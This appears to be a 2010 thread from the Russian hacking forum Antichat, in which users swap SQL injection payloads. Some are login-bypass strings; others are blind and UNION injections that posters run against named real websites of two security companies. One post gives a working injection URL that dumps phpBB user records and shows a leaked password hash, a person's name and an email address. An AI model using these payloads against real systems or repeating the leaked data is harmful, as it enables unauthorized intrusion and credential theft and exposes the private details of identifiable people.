ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.03.2010, 22:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от попугай
select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'
Можно в админку попасть тут?
select * from users where login='admin ' or 1=1/* ' and passwd='202cb962ac59075b964b07152d234b70'
Точно не уверен,попробуй
|
|
|
16.03.2010, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Seravin
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?
Код:
select * from users where login='admin' or 1=1+--+'
если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
Да, комменты я пробовал - не получалось. Неправильно делал.
Я забыл про закрывающую кавычку и камент, сделал так
select * from users where login=' admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'
пустило.
|
|
|
|
16.03.2010, 23:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от попугай
Да, комменты я пробовал - не получалось. Неправильно делал.
Я забыл про закрывающую кавычку и камент, сделал так
select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'
пустило.
# еще можна использовать, если используеться гет, то перевести в 16-ную...
Последний раз редактировалось Strilo4ka; 17.03.2010 в 02:11..
|
|
|
|
17.03.2010, 03:14
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
|
|
|
|
17.03.2010, 03:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от [Feldmarschall]
на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
может схемы просто нет (ветка ниже) или код символа ниже возьми...
скрипт (нижний пост) заюзай хоть и на пхп или другой инструмент возьми, если слепая.
Последний раз редактировалось Strilo4ka; 17.03.2010 в 03:39..
|
|
|
|
17.03.2010, 18:17
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
там внизу под ошибкой sql стоит
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
You have an error in your SQL syntax;...................
[TEP STOP]
и разкрутить вроде неразу не удалось.. что это может быть?
|
|
|
|
17.03.2010, 18:38
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
объясни что знaчит проходит и нe проходит, т.к. пeрвый зaпрос должeн дaть пустой рeзультaт
|
|
|
|
17.03.2010, 20:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Ну смотрим кто что скажет...
http://azone-it.ru/index.php?option=com_content&task=view&id=30&Itemi d=52'
выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности 
И вот тоже как блинд крутить можно ...
http://www.lins-m.ru/index.php?ID=51+and+5=(select%20version())--+
О компании
Компания «ЛИНС-М» предлагает следующий перечень профессиональных услуг для обеспечения безопасности ИС организаций
с юнион мну не получилось...
Последний раз редактировалось Strilo4ka; 17.03.2010 в 20:47..
|
|
|
|
17.03.2010, 22:54
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Strilo4ka
Ну смотрим кто что скажет...
выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности
И вот тоже как блинд крутить можно ...
О компании
с юнион мну не получилось...
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111
Код:
http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5--
~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~
|
|
|
|
17.03.2010, 23:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от [Feldmarschall]
MySQL версия 5.0.67
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111
Код:
http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5--
~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~
молодец ступил просто
когда посылал
http://www.lins-m.ru/index.php?ID=50+order+by+4--+
то контент выводился,
а когда
http://www.lins-m.ru/index.php?ID=50+order+by+5--+
нет , и решил шо 4 поля, +++
Сайт походу умер, за ним не следять так как Copyright © 2008, LINS-M... Просто целесообразно текущий год ставить, имхо...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1988196){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1988783){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1990087){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1991020){kind=avatar}
Похожие темы
Линейный вид
